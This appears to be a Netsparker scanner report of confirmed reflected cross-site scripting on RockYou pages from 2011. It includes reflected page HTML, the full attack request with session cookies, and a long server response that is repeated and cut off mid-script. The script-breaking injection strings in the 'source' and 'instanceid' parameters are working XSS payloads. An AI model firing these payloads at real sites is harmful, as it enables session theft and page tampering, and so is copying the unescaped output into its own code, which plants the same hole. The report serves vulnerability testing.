document.selection.createRange().execCommand("Copy");
}
</script>
<table><tr><td valign="top" >
<div style="position:relative">
<div id="viewslideshow" style="margin-left: 10px; border:1px solid #cccccc;"></div>
</div>
<div style="float:right;display:inline"><a href="show_my_gallery.php?instanceid=117242930�'"--></style></script><script>netsparker(0x00107F)</script>">View Full Show</a></div>
<div style="clear:both"></div>
<div style="background-color:#e9e8e8;border:solid #aaa 1px;width:340px;margin-top:10px;margin-left:11px;padding-top:3px" align="center">
<strong>Embed Code</strong><br />
<textarea id="slidecontent" wrap="hard" onClick="this.focus(); this.select();" style="margin:2px auto 5px auto;border: solid 1px #aaa;background:#fff;font-size:12px;font-family:Arial, Helvetica, sans-serif; height:50; color:#666; width: 300px; overflow:hidden;"><embed src="http://apps.rockyou.com/rockyou.swf?instanceid=117242930�'"--></style></script><script>netsparker(0x00107F)</script>" quality="high" wmode="transparent" width="426" height="320" flashvars="appWidth=325&appHeight=244" name="slideshowpreview" align="middle" allowScriptAccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"/><br><img src="http://apps.rockyou.com/dot.gif"><a target="_BLANK" href="http://www.rockyou.com?type=slideshow&refid=117242930�'"--></style></script><script>netsparker(0x00107F)</script>"><img title="RockYou slideshow" src="http://apps.rockyou.com/images/logo-mini.gif" border="0"></a> <a target="_BLANK" href="http://www.rockyou.com/slideshow-create.php?source=cyo&refid=117242930�'"--></style></script><script>netsparker(0x00107F)</script>">Create Your Own</a><a style="padding-right:0px;" target="_BLANK" href=" http://www.rockyou.com/slideshow-viewplaylist.php?instanceid=117242930�'"--></style></script><script>netsparker(0x00107F)</script>"><img style="border:0px;" src="http://apps.rockyou.com/images/tail_playlist.gif "></a></textarea>
<br />
<a href="javascript: CopyToClipboard();"><img src="images/rockyou_music-copybutton.jpg" style="margin-bottom:7px" /></a>
<!--br><center><a onclick="urchinTracker ('/links/viewplaylist/slideshowcreate')" href="/slideshow-create.php?source=svp"><img src="/images/button-createslideshow-big.gif"></a></center1-->
</td><td valign="top">
<div style="font-weight: bold; font-size:24px;font-family: arial;">
<img src='images/rockyou_music-banner.jpg'>
<p style="margin:10px 0px 0px 0px;">Song Playlist</div>
<table width='450px'><tr style='background-color:#e9e8e8;'><td>1</td><td style='width: 80px; height:80px;'><div style='position:relative'><a href='javascript:previewSong("http://apps.rockyou.com/music/0/0/4/492.mp3",1);'><img height='80' src='http://apps.rockyou.com/images/spacer.gif'><img id='playicon-1' style='position:absolute;left:20px;top:20px;' src='/images/icon-playbig.gif'></a></div></td><td><b style='font-size: 18px;'>Chicken Fried</b><br>Zac Brown Band<br /><br /><a onclick='urchinTracker("/links/viewplaylist/492");' href='/music/music_slideshow_create.php?songid=492'>Get This Song in a Slideshow</a></td></tr></table><div style='text-align:right;margin-top:5px;'>
<img src="/images/logos/snocap.png" style="border:1px solid #CCCCCC">
<img src="/images/bebo-bands-logo.jpg" style="border:1px solid #CCCCCC">
<img src="/images/logo-nettwerk.jpg" style="border:1px solid #CCCCCC">
<img src="/images/logo-pumpaudio.jpg" style="border:1px solid #CCCCCC">
</div>
</td></tr></table><div id='music-player'></div>
<div style='position: absolute; left: 850px; top: 0px; width: 160px;'>
</div>
<style>
.footmenublk:link {font-family:Arial;color:#f26522;font-size: 10px;font-weight:bold;text-decoration:underline;}
.footmenublk:visited {font-family:Arial;color:#f26522;font-size: 10px;font-weight:bold;text-decoration:underline;}
.footmenublk:active {font-family:Arial;color:#f26522;font-size: 10px;font-weight:bold;text-decoration:underline;}
.footmenublk:hover {font-family:Arial;color:#f26522;font-size: 10px;font-weight:bold;text-decoration:underline;}
</style>
<br><br>
<div class="tp"><span style="color:#CCCCCC">
Copyright © 2007 RockYou | <a target="_BLANK" href="/help" class="footmenublk">FAQ / Help</a> | <a target="_BLANK" href="/privacypolicy.php" class="footmenublk">Privacy</a> | <a href="/tos.php" target=_blank class="footmenublk">Terms of Use</a> | <a href="/corp/facebook/ad.php" target="_blank" class="footmenublk">Facebook Advertisers</a> | <a href="/corp/facebook/dev.php" target="_blank" class="footmenublk">Facebook Developers</a> | <a href="/corp/about.php" target=_blank class="footmenublk">About Us</a></span></div>
<div class="tp">
| <a href="?lang=en&instanceid=117242930�'"--></style></script><script>netsparker(0x00107F)</script>" class="footmenublk">English</a> | <a href="?lang=zh&instanceid=117242930�'"--></style></script><script>netsparker(0x00107F)</script>" class="footmenublk">中文</a> | <a href="?lang=es&instanceid=117242930�'"--></style></script><script>netsparker(0x00107F)</script>" class="footmenublk">Español | <a href="?lang=pt&instanceid=117242930�'"--></style></script><script>netsparker(0x00107F)</script>" class="footmenublk">Português</a></a>
</div>
<br>
<..
|
- /slideshow-create.php
/slideshow-create.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| source | GET | '"--></style></script><script>alert(0x001081)</script> |
| refid | GET | 117242930 |
Request
GET /slideshow-create.php?source='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001081)%3C/script%3E&refid=117242930 HTTP/1.1
Referer: http://www.rockyou.com/featuredartists.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164738; ctid=1; sns_type=rockyou.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://www.rockyou.com/featuredartists.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164738; ctid=1; sns_type=rockyou.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:12:19 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:12:18 GMT; path=/; domain=.rockyou.com,lastlogin=1303164739; expires=Wed, 27-Jul-2011 22:12:19 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:12:19 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=24988 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 26971
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="create-slideshow-js-combined.php?ver=2" type="text/javascript"></script><script src="/js/greybox/jquery-latest.js" type="text/javascript"></script><script src="/js/greybox/greybox.js?2" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
<link href="/css/create-slideshow-combined.css?ver=6" rel="stylesheet" type="text/css"><link href="/css/../js/greybox/greybox.css?ver=6" rel="stylesheet" type="text/css">
</HEAD>
<BODY class="background_normal"
style=""
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initDND();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="height:5px;padding:0px;margin:0px;overflow:hidden"></div>
<script language="javascript" type="text/javascript" src="/js/flash_file_uploader.js"></script><script language="javascript" type="text/javascript" src="/js/iuembed.js"></script><script type="text/javascript">// Suppress multifile uploadervar suppressMulti = false;// variable needed for grey box modal dialog for the 'More Songs' linkvar GB_ANIMATION = true; // we have a variable in create.js that needs to know about the right translation for a text.var lang_upload_confirm_delete_slide = "Do you really want to delete this slide?";var lang_slideshow_aspect_43_only = "Only 4:3 Available";var lang_slideshow_aspect_43 = "TV (4:3)";var lang_slideshow_aspect_21 = "Wide (2:1)";var lang_slideshow_aspect_31 = "Strip (3:1)";var lang_empty_caption = "[Click to Add a Caption]";var lang_remove_all_captions = "Are you sure you want to remove all captions?";var lang_abandon_slideshow = "Abandon this slideshow and START OVER?";var evalThis;var thisinstanceid = '';var tagListArray; var xmlreqs = true; //Disable / enable xmlrequestsvar xmlBatchReq = ""; //Batch Stringvar playingSong = 0; //Current Song that is playingvar storedSongList = ""; //List of Songs responde from AJAXvar statusAddingSong = false;var mycustomtabs = new Array("cattags","transitions","themes","skins","backgrounds", "music","privacy","size","caption","min");var openWithCreateMode = 0;var sizeLevel = 3;var pitchLearnMoreBeboBands = 1; var slideCount = 0;var beforeUnloadStatus = 0;var beforeUnloadStatusEnabled = 1;var bgColorManualSet = 0;var ghost_popup = new Ghost_Popup('ghost_popup');var ghost_popup_music = new Ghost_Popup('ghost_popup_music');var source = "'"--></style></script><script>netsparker(0x001081)</script>";var currentSkin = '';var currentTransition = '';var currentBackground = '';var currentTheme = '';var currentRatio = 0;var skinConfig = 1;var removePreviewSlide = 0;var slideShowCount="0";//var slideShowCount="0";embed = new appEmbed(thisinstanceid);membed = new musicEmbed(thisinstanceid);embed.setLocal(true);embed.noSound=true;embed.noShare=true;function confirmAbandon() { if (openWithCreateMode == 1 && slideCount > 0 && beforeUnloadStatus == 1) { event.returnValue = "If you continue, this slideshow will be abandoned!"; } beforeUnloadStatus = beforeUnloadStatusEnabled;}function initDND() { document.getElementById('loadingsection_container').className = 'background_normal'; // for partner sites, switch to smaller logo var partner_logo_big = document.getElementById("partner_logo_big"); var partner_logo_small = document.getElementById("partner_logo_small"); if (partner_logo_big) partner_logo_big.style.display = "none"; if (partner_logo_small) partner_logo_small.style.display = "block"; var rockyou_logo = document.getElementById("logo"); if (rockyou_logo) rockyou_logo.style.display = "block"; setupFileUploader(); printCountrySelect(document.getElementById("countryselect")); document.getElementById('loadingsection').innerHTML = ''; document.getElementById('loadingsection').style.display = 'none'; document.getElementById('ticker_area').style.display=""; document.getElementById('upload-and-customize').style.display=""; var bannerheading = document.getElementById('bannerheading'); if (bannerheading) bannerheading.style.display=""; initSectionsNew();}function initSectionsNew(){ supermaxUL(); //document.getElementById('toptab-container').style.display=""; document.getElementById('uploadsection').style.display=""; showUploadDiv(); hasInstanceIDEmbed(); simple_ajax_call('email/ajax_email_tracking.php?message=3&widget=slideshow&instanceid=0', false); openWithCreateMode = 1; document.getElementById("bebo_bubble").style.display = "block";}function initSections(){ if (openWithCreateMode == 1) { // randomize transition updateTransition("photostack2"); } document.getElementById('arrange-and-caption').style.display=""; document.getElementById('quickstyles').style.display=""; document.getElementById('div-upload').style.display=""; document.getElementById('tab-customize').style.display=""; document.getElementById('div-arrange').style.display=""; embed.isScale = false;currentSkin = ''; currentTransition = 'photostack'; currentRatio = 1; skinConfig = 1; currentTheme = ''; currentBackground = ''; setAspectRatioControls(); setBackgroundControls(); setSkinControls(); setSizeControls(); showCookieUploadTab(); showCustomizeDiv(); regUL(); refreshSlideShow(); refreshMusic(0); //Tags tagListArray = []; tagList(tagListArray); setPeopleMap('','','',''); //Songs songListArray = []; songList(songListArray); if (openWithCreateMode == 1) { simple_ajax_call('email/ajax_email_tracking.php?message=4&widget=slideshow&instanceid='+thisinstanceid, false); Set_Cookie('last_created_slideshow', thisinstanceid, 1); } else { if (thisinstanceid != parseInt(Get_Cookie('last_created_slideshow'))) { Set_Cookie('last_created_slideshow', 0, 1); } } // change the instruction var multi_uploader_instruction = document.getElementById("multi_uploader_instruction"); if (multi_uploader_instruction) { multi_uploader_instruction.innerHTML = '<p style="font-size:16px;font-weight:bold;margin-bottom:10px;">Next steps</p>' + '<ul style="font-size:13px;margin-left:10px;">' + '<li>Add more slides</li>' + '<li>To edit captions, scroll down</li>' + '<li>To move and delete slides, scroll down</li>' + '<li>Try the customization options to the right</li>' + '<li>Click Save when you\'re done</li>' + '</ul>' + '<p style="font-size:15px;margin-top:15px;">If you\'re having trouble uploading, <a target="_blank" href="/contact.php" style="text-decoration:underline">let us know</a>.</p>'; } setDefaultPublishSize(3); if (Get_Cookie('bubble_html_file_upload_edit_hide') == null) { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_bottom'; } } else { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_hidden'; } } document.getElementById("bebo_bubble").style.display = "none"; if (Get_Cookie('bubble_save_hide') == null) { document.getElementById("bubble_save1").style.display = "block"; } else { document.getElementById("bubble_save1").style.display = "none"; } //Colors loadSV(); updateH('F1FFCC'); if (window.attachEvent) { window.attachEvent("onbeforeunload", confirmAbandon); } balance_tabs_reset(); setTimeout("balance_tabs_set();", 1000);}function hasInstanceIDEmbed(){ var loc = window.location.href; var instanceString = loc.match("#instanceid=([0-9]*)"); if (instanceString != null) { if (parseInt(instanceString[1]) > 0) window.location='slideshow-create.php?source='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001081)%3C/script%3E&refid=117242930&create=1&instanceid='+instanceString[1]; }}// Flash uploader calls this function when the user has chosen image(s) to upload and on initfunction beginFlashUpload() { var initObj = {}; initObj.instanceid = thisinstanceid; initObj.infront = (document.getElementById('uploadplace').infront.checked) ? true : false; initObj.dataHost = 'http://www.rockyou.com/addimage.php?type=file_html&userid=-1'; return initObj;}// Called on return of flash uploaderfunction flashUploadComplete(instanceid, errorcode, errormessage) { urchinTracker('/flashuploader/complete'); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noShare=true; //Reload page with slideshow var location = window.location.href; if (location.indexOf('?') != -1) location += "&instanceid="+instanceid; else location += "?instanceid="+instanceid; window.location = location; } else { if (parseInt(errorcode) > 0) { document.getElementById('ulerror').style.display=''; document.getElementById('ulerror').innerHTML=errorcode + " - " + errormessage; } else { document.getElementById('ulerror').innerHTML=""; document.getElementById('ulerror').style.display='none'; refreshList(); clearCaptions(); clearEntry(); } if (removePreviewSlide == 1) { setTimeout('xmlhttpPost("remove_preview_slide", 1);', 1000); removePreviewSlide = 0; } }}function uploadComplete(errorcode, errormessage, url, instanceid){ if (parseInt(errorcode) > 0) { ghost_popup.show("photo upload failed", 13, 10, 60, 100, 1, "frm"); } else { ghost_popup.show("photo uploaded", 13, 10, 60, 100, 1, "frm"); } var form2 = document.getElementById("form2"); if (form2) { form2.reset(); } hideUploading(); clearInterval(progressInterval); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); mem..
Date: Mon, 18 Apr 2011 22:12:19 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:12:18 GMT; path=/; domain=.rockyou.com,lastlogin=1303164739; expires=Wed, 27-Jul-2011 22:12:19 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:12:19 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=24988 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 26971
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="create-slideshow-js-combined.php?ver=2" type="text/javascript"></script><script src="/js/greybox/jquery-latest.js" type="text/javascript"></script><script src="/js/greybox/greybox.js?2" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
<link href="/css/create-slideshow-combined.css?ver=6" rel="stylesheet" type="text/css"><link href="/css/../js/greybox/greybox.css?ver=6" rel="stylesheet" type="text/css">
</HEAD>
<BODY class="background_normal"
style=""
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initDND();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="height:5px;padding:0px;margin:0px;overflow:hidden"></div>
<script language="javascript" type="text/javascript" src="/js/flash_file_uploader.js"></script><script language="javascript" type="text/javascript" src="/js/iuembed.js"></script><script type="text/javascript">// Suppress multifile uploadervar suppressMulti = false;// variable needed for grey box modal dialog for the 'More Songs' linkvar GB_ANIMATION = true; // we have a variable in create.js that needs to know about the right translation for a text.var lang_upload_confirm_delete_slide = "Do you really want to delete this slide?";var lang_slideshow_aspect_43_only = "Only 4:3 Available";var lang_slideshow_aspect_43 = "TV (4:3)";var lang_slideshow_aspect_21 = "Wide (2:1)";var lang_slideshow_aspect_31 = "Strip (3:1)";var lang_empty_caption = "[Click to Add a Caption]";var lang_remove_all_captions = "Are you sure you want to remove all captions?";var lang_abandon_slideshow = "Abandon this slideshow and START OVER?";var evalThis;var thisinstanceid = '';var tagListArray; var xmlreqs = true; //Disable / enable xmlrequestsvar xmlBatchReq = ""; //Batch Stringvar playingSong = 0; //Current Song that is playingvar storedSongList = ""; //List of Songs responde from AJAXvar statusAddingSong = false;var mycustomtabs = new Array("cattags","transitions","themes","skins","backgrounds", "music","privacy","size","caption","min");var openWithCreateMode = 0;var sizeLevel = 3;var pitchLearnMoreBeboBands = 1; var slideCount = 0;var beforeUnloadStatus = 0;var beforeUnloadStatusEnabled = 1;var bgColorManualSet = 0;var ghost_popup = new Ghost_Popup('ghost_popup');var ghost_popup_music = new Ghost_Popup('ghost_popup_music');var source = "'"--></style></script><script>netsparker(0x001081)</script>";var currentSkin = '';var currentTransition = '';var currentBackground = '';var currentTheme = '';var currentRatio = 0;var skinConfig = 1;var removePreviewSlide = 0;var slideShowCount="0";//var slideShowCount="0";embed = new appEmbed(thisinstanceid);membed = new musicEmbed(thisinstanceid);embed.setLocal(true);embed.noSound=true;embed.noShare=true;function confirmAbandon() { if (openWithCreateMode == 1 && slideCount > 0 && beforeUnloadStatus == 1) { event.returnValue = "If you continue, this slideshow will be abandoned!"; } beforeUnloadStatus = beforeUnloadStatusEnabled;}function initDND() { document.getElementById('loadingsection_container').className = 'background_normal'; // for partner sites, switch to smaller logo var partner_logo_big = document.getElementById("partner_logo_big"); var partner_logo_small = document.getElementById("partner_logo_small"); if (partner_logo_big) partner_logo_big.style.display = "none"; if (partner_logo_small) partner_logo_small.style.display = "block"; var rockyou_logo = document.getElementById("logo"); if (rockyou_logo) rockyou_logo.style.display = "block"; setupFileUploader(); printCountrySelect(document.getElementById("countryselect")); document.getElementById('loadingsection').innerHTML = ''; document.getElementById('loadingsection').style.display = 'none'; document.getElementById('ticker_area').style.display=""; document.getElementById('upload-and-customize').style.display=""; var bannerheading = document.getElementById('bannerheading'); if (bannerheading) bannerheading.style.display=""; initSectionsNew();}function initSectionsNew(){ supermaxUL(); //document.getElementById('toptab-container').style.display=""; document.getElementById('uploadsection').style.display=""; showUploadDiv(); hasInstanceIDEmbed(); simple_ajax_call('email/ajax_email_tracking.php?message=3&widget=slideshow&instanceid=0', false); openWithCreateMode = 1; document.getElementById("bebo_bubble").style.display = "block";}function initSections(){ if (openWithCreateMode == 1) { // randomize transition updateTransition("photostack2"); } document.getElementById('arrange-and-caption').style.display=""; document.getElementById('quickstyles').style.display=""; document.getElementById('div-upload').style.display=""; document.getElementById('tab-customize').style.display=""; document.getElementById('div-arrange').style.display=""; embed.isScale = false;currentSkin = ''; currentTransition = 'photostack'; currentRatio = 1; skinConfig = 1; currentTheme = ''; currentBackground = ''; setAspectRatioControls(); setBackgroundControls(); setSkinControls(); setSizeControls(); showCookieUploadTab(); showCustomizeDiv(); regUL(); refreshSlideShow(); refreshMusic(0); //Tags tagListArray = []; tagList(tagListArray); setPeopleMap('','','',''); //Songs songListArray = []; songList(songListArray); if (openWithCreateMode == 1) { simple_ajax_call('email/ajax_email_tracking.php?message=4&widget=slideshow&instanceid='+thisinstanceid, false); 